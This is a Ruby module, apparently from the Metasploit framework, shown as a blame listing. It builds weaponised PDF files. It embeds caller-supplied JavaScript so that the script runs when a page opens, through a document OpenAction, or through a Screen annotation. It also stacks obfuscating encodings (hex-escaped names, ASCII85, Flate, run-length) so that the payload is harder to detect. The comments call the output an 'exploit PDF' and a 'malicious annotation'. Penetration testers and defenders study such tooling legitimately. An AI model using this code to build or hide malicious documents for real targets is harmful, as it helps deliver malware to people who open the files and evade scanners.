2012-06-29 05:18:28 +00:00
|
|
|
# -*- coding: binary -*-
|
2010-11-22 12:21:49 +00:00
|
|
|
|
|
|
|
###
|
|
|
|
#
|
|
|
|
# This module provides methods for creating PDF files.
|
|
|
|
#
|
|
|
|
###
|
|
|
|
|
|
|
|
module Msf
|
|
|
|
module Exploit::PDF
|
|
|
|
|
2013-08-30 21:28:33 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super
|
|
|
|
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptBool.new('PDF::Obfuscate', [ true, 'Whether or not we should obfuscate the output', true ]),
|
|
|
|
OptString.new('PDF::Method', [ true, 'Select PAGE, DOCUMENT, or ANNOTATION' , 'DOCUMENT']),
|
|
|
|
OptString.new('PDF::Encoder', [ true, 'Select encoder for JavaScript Stream, valid values are ASCII85, FLATE, and ASCIIHEX', 'ASCIIHEX']),
|
|
|
|
OptInt.new('PDF::MultiFilter', [ true, 'Stack multiple encodings n times', 1]),
|
|
|
|
], Msf::Exploit::PDF
|
|
|
|
)
|
|
|
|
|
|
|
|
# We're assuming we'll only create one pdf at a time here.
|
2014-05-31 20:48:24 +00:00
|
|
|
@xref = {}
|
2013-08-30 21:28:33 +00:00
|
|
|
@pdf = ''
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Original Filters
|
|
|
|
##
|
|
|
|
|
2015-01-06 18:42:06 +00:00
|
|
|
def ascii_hex_whitespace_encode(str)
|
2013-08-30 21:28:33 +00:00
|
|
|
return str if not datastore['PDF::Obfuscate']
|
|
|
|
result = ""
|
|
|
|
whitespace = ""
|
|
|
|
str.each_byte do |b|
|
|
|
|
result << whitespace << "%02x" % b
|
|
|
|
whitespace = " " * (rand(3) + 1)
|
|
|
|
end
|
|
|
|
result << ">"
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Filters from Origami parser
|
|
|
|
##
|
2015-01-06 18:42:06 +00:00
|
|
|
def run_length_encode(stream)
|
2013-08-30 21:28:33 +00:00
|
|
|
eod = 128
|
|
|
|
result = ""
|
|
|
|
i = 0
|
|
|
|
|
|
|
|
while i < stream.size
|
|
|
|
#
|
|
|
|
# How many identical bytes coming?
|
|
|
|
#
|
|
|
|
length = 1
|
|
|
|
while i+1 < stream.size and length < eod and stream[i] == stream[i+1]
|
|
|
|
length = length + 1
|
|
|
|
i = i + 1
|
|
|
|
end
|
|
|
|
|
|
|
|
#
|
|
|
|
# If more than 1, then compress them.
|
|
|
|
#
|
|
|
|
if length > 1
|
|
|
|
result << (257 - length).chr << stream[i,1]
|
|
|
|
|
|
|
|
#
|
|
|
|
# Otherwise how many different bytes to copy ?
|
|
|
|
#
|
|
|
|
else
|
|
|
|
j = i
|
|
|
|
while j+1 < stream.size and (j - i + 1) < eod and stream[j] != stream[j+1]
|
|
|
|
j = j + 1
|
|
|
|
end
|
|
|
|
|
|
|
|
length = j - i
|
|
|
|
result << length.chr << stream[i, length+1]
|
|
|
|
|
|
|
|
i = j
|
|
|
|
end
|
|
|
|
|
|
|
|
i = i + 1
|
|
|
|
end
|
|
|
|
result << eod.chr
|
|
|
|
end
|
|
|
|
|
2015-01-06 18:42:06 +00:00
|
|
|
def random_non_ascii_string(count)
|
2013-08-30 21:28:33 +00:00
|
|
|
result = ""
|
|
|
|
count.times do
|
|
|
|
result << (rand(128) + 128).chr
|
|
|
|
end
|
|
|
|
result
|
|
|
|
end
|
|
|
|
|
2015-01-06 18:42:06 +00:00
|
|
|
def ascii85_encode(stream)
|
2013-08-30 21:28:33 +00:00
|
|
|
eod = "~>"
|
|
|
|
i = 0
|
|
|
|
code = ""
|
|
|
|
input = stream.dup
|
|
|
|
|
|
|
|
while i < input.size do
|
|
|
|
|
|
|
|
if input.length - i < 4
|
|
|
|
addend = 4 - (input.length - i)
|
|
|
|
input << "\0" * addend
|
|
|
|
else
|
|
|
|
addend = 0
|
|
|
|
end
|
|
|
|
|
|
|
|
inblock = (input[i].ord * 256**3 + input[i+1].ord * 256**2 + input[i+2].ord * 256 + input[i+3].ord)
|
|
|
|
outblock = ""
|
|
|
|
|
|
|
|
5.times do |p|
|
|
|
|
c = inblock / 85 ** (4 - p)
|
|
|
|
outblock << ("!"[0].ord + c).chr
|
|
|
|
inblock -= c * 85 ** (4 - p)
|
|
|
|
end
|
|
|
|
|
|
|
|
outblock = "z" if outblock == "!!!!!" and addend == 0
|
|
|
|
|
|
|
|
if addend != 0
|
|
|
|
outblock = outblock[0,(4 - addend) + 1]
|
|
|
|
end
|
|
|
|
|
|
|
|
code << outblock
|
|
|
|
i = i + 4
|
|
|
|
end
|
|
|
|
code << eod
|
|
|
|
end
|
|
|
|
|
|
|
|
# http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
2015-01-06 18:42:06 +00:00
|
|
|
def nobfu(str)
|
2013-08-30 21:28:33 +00:00
|
|
|
return str if not datastore['PDF::Obfuscate']
|
|
|
|
|
|
|
|
result = ""
|
|
|
|
str.scan(/./u) do |c|
|
|
|
|
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
|
|
|
result << "#%x" % c.unpack("C*")[0]
|
|
|
|
else
|
|
|
|
result << c
|
|
|
|
end
|
|
|
|
end
|
|
|
|
result
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#PDF building block functions
|
|
|
|
##
|
|
|
|
def header(version = '1.5')
|
2014-05-31 20:48:24 +00:00
|
|
|
hdr = "%PDF-#{version}" << eol
|
2015-01-06 18:42:06 +00:00
|
|
|
hdr << "%" << random_non_ascii_string(4) << eol
|
2013-08-30 21:28:33 +00:00
|
|
|
hdr
|
|
|
|
end
|
|
|
|
|
|
|
|
def add_object(num, data)
|
2014-05-31 20:48:24 +00:00
|
|
|
@xref[num] = @pdf.length
|
2015-01-06 18:42:06 +00:00
|
|
|
@pdf << io_def(num)
|
2013-08-30 21:28:33 +00:00
|
|
|
@pdf << data
|
|
|
|
@pdf << endobj
|
|
|
|
end
|
|
|
|
|
|
|
|
def finish_pdf
|
|
|
|
@xref_offset = @pdf.length
|
|
|
|
@pdf << xref_table
|
|
|
|
@pdf << trailer(1)
|
|
|
|
@pdf << startxref
|
|
|
|
@pdf
|
|
|
|
end
|
|
|
|
|
|
|
|
def xref_table
|
2014-05-31 20:48:24 +00:00
|
|
|
id = @xref.keys.max+1
|
2013-08-30 21:28:33 +00:00
|
|
|
ret = "xref" << eol
|
2014-05-31 20:48:24 +00:00
|
|
|
ret << "0 %d" % id << eol
|
2013-08-30 21:28:33 +00:00
|
|
|
ret << "0000000000 65535 f" << eol
|
2014-05-31 20:48:24 +00:00
|
|
|
ret << (1..@xref.keys.max).map do |index|
|
|
|
|
if @xref.has_key?(index)
|
|
|
|
offset = @xref[index]
|
|
|
|
"%010d 00000 n" % offset << eol
|
|
|
|
else
|
|
|
|
"0000000000 00000 f" << eol
|
|
|
|
end
|
|
|
|
end.join
|
|
|
|
|
2013-08-30 21:28:33 +00:00
|
|
|
ret
|
|
|
|
end
|
|
|
|
|
2014-05-31 22:47:54 +00:00
|
|
|
def trailer(root_obj)
|
2015-01-06 18:49:39 +00:00
|
|
|
ret = "trailer" << nobfu("<</Size %d/Root " % (@xref.length + 1)) << io_ref(root_obj) << ">>" << eol
|
2014-05-31 22:47:54 +00:00
|
|
|
ret
|
2013-08-30 21:28:33 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def startxref
|
|
|
|
ret = "startxref" << eol
|
|
|
|
ret << @xref_offset.to_s << eol
|
|
|
|
ret << "%%EOF" << eol
|
|
|
|
ret
|
|
|
|
end
|
|
|
|
|
|
|
|
def eol
|
2014-05-31 20:48:24 +00:00
|
|
|
@eol || "\x0d\x0a"
|
2013-08-30 21:28:33 +00:00
|
|
|
end
|
|
|
|
|
2014-05-31 21:14:52 +00:00
|
|
|
def eol=(new_eol)
|
|
|
|
@eol = new_eol
|
|
|
|
end
|
|
|
|
|
2013-08-30 21:28:33 +00:00
|
|
|
def endobj
|
|
|
|
"endobj" << eol
|
|
|
|
end
|
|
|
|
|
2015-01-06 18:42:06 +00:00
|
|
|
def io_def(id)
|
2013-08-30 21:28:33 +00:00
|
|
|
"%d 0 obj" % id
|
|
|
|
end
|
|
|
|
|
2015-01-06 18:42:06 +00:00
|
|
|
def io_ref(id)
|
2013-08-30 21:28:33 +00:00
|
|
|
"%d 0 R" % id
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Controller funtion, should be entrypoint for pdf exploits
|
|
|
|
##
|
2015-01-06 18:42:06 +00:00
|
|
|
def create_pdf(js)
|
2013-08-30 21:28:33 +00:00
|
|
|
strFilter = ""
|
|
|
|
arrResults = []
|
|
|
|
numIterations = 0
|
|
|
|
arrEncodings = ['ASCII85','ASCIIHEX','FLATE','RUN']
|
|
|
|
arrEncodings = arrEncodings.shuffle
|
|
|
|
if datastore['PDF::MultiFilter'] < arrEncodings.length
|
|
|
|
numIterations = datastore['PDF::MultiFilter']
|
|
|
|
else
|
|
|
|
numIterations = arrEncodings.length
|
|
|
|
end
|
|
|
|
for i in (0..numIterations-1)
|
|
|
|
if i == 0
|
2015-01-06 18:42:06 +00:00
|
|
|
arrResults = select_encoder(js,arrEncodings[i],strFilter)
|
2013-08-30 21:28:33 +00:00
|
|
|
next
|
|
|
|
end
|
2015-01-06 18:42:06 +00:00
|
|
|
arrResults = select_encoder(arrResults[0],arrEncodings[i],arrResults[1])
|
2013-08-30 21:28:33 +00:00
|
|
|
end
|
|
|
|
case datastore['PDF::Method']
|
|
|
|
when 'PAGE'
|
|
|
|
pdf_with_page_exploit(arrResults[0],arrResults[1])
|
|
|
|
when 'DOCUMENT'
|
|
|
|
pdf_with_openaction_js(arrResults[0],arrResults[1])
|
|
|
|
when 'ANNOTATION'
|
|
|
|
pdf_with_annot_js(arrResults[0],arrResults[1])
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Select an encoder and build a filter specification
|
|
|
|
##
|
2015-01-06 18:42:06 +00:00
|
|
|
def select_encoder(js,strEncode,strFilter)
|
2013-08-30 21:28:33 +00:00
|
|
|
case strEncode
|
|
|
|
when 'ASCII85'
|
2015-01-06 18:42:06 +00:00
|
|
|
js = ascii85_encode(js)
|
2013-08-30 21:28:33 +00:00
|
|
|
strFilter = "/ASCII85Decode"<<strFilter
|
|
|
|
when 'ASCIIHEX'
|
2015-01-06 18:42:06 +00:00
|
|
|
js = ascii_hex_whitespace_encode(js)
|
2013-08-30 21:28:33 +00:00
|
|
|
strFilter = "/ASCIIHexDecode"<<strFilter
|
|
|
|
when 'FLATE'
|
|
|
|
js = Zlib::Deflate.deflate(js)
|
|
|
|
strFilter = "/FlateDecode"<<strFilter
|
|
|
|
when 'RUN'
|
2015-01-06 18:42:06 +00:00
|
|
|
js = run_length_encode(js)
|
2013-08-30 21:28:33 +00:00
|
|
|
strFilter = "/RunLengthDecode"<<strFilter
|
|
|
|
end
|
|
|
|
return js,strFilter
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Create PDF with Page implant
|
|
|
|
##
|
|
|
|
def pdf_with_page_exploit(js,strFilter)
|
2014-05-31 20:48:24 +00:00
|
|
|
@xref = {}
|
2013-08-30 21:28:33 +00:00
|
|
|
@pdf = ''
|
|
|
|
|
|
|
|
@pdf << header
|
2015-01-06 18:49:39 +00:00
|
|
|
add_object(1, nobfu("<</Type/Catalog/Outlines ") << io_ref(2) << nobfu("/Pages ") << io_ref(3) << ">>")
|
|
|
|
add_object(2, nobfu("<</Type/Outlines/Count 0>>"))
|
|
|
|
add_object(3, nobfu("<</Type/Pages/Kids[") << io_ref(4) << nobfu("]/Count 1>>"))
|
|
|
|
add_object(4, nobfu("<</Type/Page/Parent ") << io_ref(3) << nobfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nobfu(" /AA << /O << /JS ") << io_ref(5) << nobfu("/S /JavaScript >>>>>>"))
|
2013-08-30 21:28:33 +00:00
|
|
|
compressed = js
|
|
|
|
stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
|
|
|
|
stream << "stream" << eol
|
|
|
|
stream << compressed << eol
|
|
|
|
stream << "endstream" << eol
|
|
|
|
add_object(5, stream)
|
|
|
|
|
|
|
|
finish_pdf
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Create PDF with OpenAction implant Note: doesn't carry over if
|
|
|
|
# you try to merge the exploit PDF with an innocuous one
|
|
|
|
##
|
|
|
|
def pdf_with_openaction_js(js,strFilter)
|
2014-05-31 20:48:24 +00:00
|
|
|
@xref = {}
|
2013-08-30 21:28:33 +00:00
|
|
|
@pdf = ''
|
|
|
|
|
|
|
|
@pdf << header
|
|
|
|
|
2015-01-06 18:49:39 +00:00
|
|
|
add_object(1, nobfu("<</Type/Catalog/Outlines ") << io_ref(2) << nobfu("/Pages ") << io_ref(3) << ">>")
|
|
|
|
add_object(2, nobfu("<</Type/Outlines/Count 0>>"))
|
|
|
|
add_object(3, nobfu("<</Type/Pages/Kids[") << io_ref(4) << nobfu("]/Count 1>>"))
|
|
|
|
add_object(4, nobfu("<</Type/Page/Parent ") << io_ref(3) << nobfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nobfu(" /AA << /O << /JS ") << io_ref(5) << nobfu("/S /JavaScript >>>>>>"))
|
2013-08-30 21:28:33 +00:00
|
|
|
compressed = js
|
|
|
|
stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
|
|
|
|
stream << "stream" << eol
|
|
|
|
stream << compressed << eol
|
|
|
|
stream << "endstream" << eol
|
|
|
|
add_object(5, stream)
|
|
|
|
|
|
|
|
finish_pdf
|
|
|
|
end
|
|
|
|
|
|
|
|
##
|
|
|
|
#Create PDF with a malicious annotation
|
|
|
|
##
|
|
|
|
def pdf_with_annot_js(js,strFilter)
|
2014-05-31 20:48:24 +00:00
|
|
|
@xref = {}
|
2013-08-30 21:28:33 +00:00
|
|
|
@pdf = ''
|
|
|
|
|
|
|
|
@pdf << header
|
|
|
|
|
2015-01-06 18:49:39 +00:00
|
|
|
add_object(1, nobfu("<</Type/Catalog/Outlines ") << io_ref(2) << nobfu("/Pages ") << io_ref(3) << ">>")
|
|
|
|
add_object(2, nobfu("<</Type/Outlines/Count 0>>"))
|
|
|
|
add_object(3, nobfu("<</Type/Pages/Kids[") << io_ref(4) << nobfu("]/Count 1>>"))
|
|
|
|
add_object(4, nobfu("<</Type/Page/Parent ") << io_ref(3) << nobfu("/MediaBox[%s %s %s %s] " % [rand(200),rand(200),rand(300),rand(300)]) << nobfu(" /Annots [") << io_ref(5) << nobfu("]>>"))
|
|
|
|
add_object(5, nobfu("<</Type/Annot /Subtype /Screen /Rect [%s %s %s %s] /AA << /PO << /JS " % [rand(200),rand(200),rand(300),rand(300)]) << io_ref(6) << nobfu("/S /JavaScript >>>>>>"))
|
2013-08-30 21:28:33 +00:00
|
|
|
compressed = js
|
|
|
|
stream = "<</Length %s/Filter[" % compressed.length << strFilter << "]>>" << eol
|
|
|
|
stream << "stream" << eol
|
|
|
|
stream << compressed << eol
|
|
|
|
stream << "endstream" << eol
|
|
|
|
add_object(6, stream)
|
|
|
|
|
|
|
|
finish_pdf
|
|
|
|
end
|
2014-05-31 20:48:24 +00:00
|
|
|
|
2010-11-22 12:21:49 +00:00
|
|
|
end
|
|
|
|
end
|